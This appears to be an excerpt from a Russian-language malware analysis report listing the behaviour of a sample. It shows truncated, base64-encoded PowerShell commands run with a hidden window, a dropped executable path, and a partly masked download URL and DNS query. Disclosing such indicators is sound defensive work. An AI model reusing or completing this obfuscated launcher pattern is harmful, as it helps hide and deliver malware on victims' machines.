Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBlAHQALQBJAHQARQBNACAAKAAiAFYAYQByAEkAQQBCACIAKwAiAEwAZQAiACsAIgA6ACIAKwAiAHUAdABXAEYAcAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAnAHMAWQBzAHQAZQBNACcAKwAnAC4ASQBPAC4AJwArACcARA...
- %HOMEPATH%\kxal0_n\yfo6o20\eoq7isj.exe
- http://my######egalservices.com/wp-admin/3h/
- DNS ASK my######egalservices.com
- '%HOMEPATH%\kxal0_n\yfo6o20\eoq7isj.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBlAHQALQBJAHQARQBNACAAKAAiAFYAYQByAEkAQQBCACIAKwAiAEwAZQAiACsAIgA6ACIAKwAiAHUAdABXAEYAcAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAnAHMAWQBzAHQAZQBNACcAKwAnAC4ASQBPAC4AJwArACcARA...' (со скрытым окном)